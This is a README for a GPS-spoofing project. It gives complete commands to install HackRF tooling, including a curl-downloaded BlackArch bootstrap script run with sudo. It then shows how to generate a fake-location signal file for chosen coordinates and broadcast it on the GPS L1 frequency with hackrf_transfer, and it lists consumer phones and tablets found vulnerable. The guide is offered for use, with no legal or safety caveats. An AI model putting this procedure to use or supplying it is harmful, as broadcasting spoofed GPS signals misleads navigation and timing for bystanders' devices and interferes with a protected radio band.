How to fool your GPS enabled devices using Software Defined Radio, in this case using the HackRF One.
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
then 6c4dc71002 added ideas 4 years ago
README.md added ideas 4 years ago

README.md

gps_spoofing

How to fool your GPS enabled devices using Software Defined Radio, in this case using the HackRF One. This guide is written for Arch linux. But should be relatively consistent with other platforms.

Installing on Debian

HackRF Support

$ sudo apt-update
$ sudo apt install gnuradio libhackrf0 hackrf libhackrf-dev

Hook up your HackRF and see if its recognized:

$ hackrf_info

You should see something like:

Found HackRF board.
Board ID Number: 2 (HackRF One)
Firmware Version: 2015.07.2
Part ID Number: 0xa000cw898 0x09898908  (redacted)
Serial Number: 000000000 0000 00 00000000 (redacted

GPS sim (Download + compile)

$ git clone https://github.com/osqzss/gps-sdr-sim.git
$ cd gps-sdr-sim
$ make

Making gps sim only takes a few seconds.

Installing on Arch

you could build gps-sdr-sim from scratch, but I choose to use the binary provided by the 'blackarch' distro's repository.

Prerequisits

 $ curl -O https://blackarch.org/strap.sh  
 $ chmod +x strap.sh
 $ sudo ./strap.sh (installing the keyring step takes a few minutes)
 $ sudo pacman -Syyu (update pacman sources etc. although stap.sh already seems to take care of this)
 $ sudo pacman -S blackarch-radio (just install all the radio stuff (1Gb))
 $ sudo modprobe hackrf (load the hackrf kernel module/driver)
 $ hackrf_info  (see if you can see your hack rf one)

Generate simulated motion file

Download the latest brdc file from here: ftp://cddis.gsfc.nasa.gov/gnss/data/daily (for example: ftp://cddis.gsfc.nasa.gov/gnss/data/daily/2020/brdc/brdc1460.20g.Z)

Extract the compressed file in a place you will remember

Generate binary file to be transmitted by hackrf:

 $ ./gps-sdr-sim -b 8 -e ~/LOCATION_OF_YOUR_BRDC/brdc1460.20n -l 45.803304,12.133697,100  

The default option generates a 300sec (5 min) 'motion' file. This can be increased by using using the '-d' option. The last part is the location of your choosing (lat, long, altitude). This will run for 300 seconds and generate a 'gpssim.bin' file. NOTE the lat/long/alt should not contain any spaces, only commas.

Spoof location

To transmit your spoofed gps position using the hackrf use the follwing command:

 $ hackrf_transfer -t ~/LOCATION_OF_YOUR_BIN_FILE/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0 

The motion file only simulates for a given period (-d), luckily hackrf_transfer can repeat the transmission with the '-R' switch! (see: https://www.blackhat.com/docs/eu-15/materials/eu-15-Kang-Is-Your-Timespace-Safe-Time-And-Position-Spoofing-Opensourcely-wp.pdf)

Enjoy!

Test results

Vulnurable devices tested (no need to switch of wifi, gsm etc, works out of the box):

  • iPhone 6, running iOS 12.4.4
  • Samsung s10e, running Anroid 10
  • Samsung Tab A SM-T380 (tablet), Android 9
  • Samsung S7, running Android 8.0.0 (Samsung Experience 9.0), ONLY WITH WIFI DISABLED!

Not Vulnurable (also not with wifi disabled):

  • iPhone SE (2nd gen)
  • iPhone X

Improvements / Ideas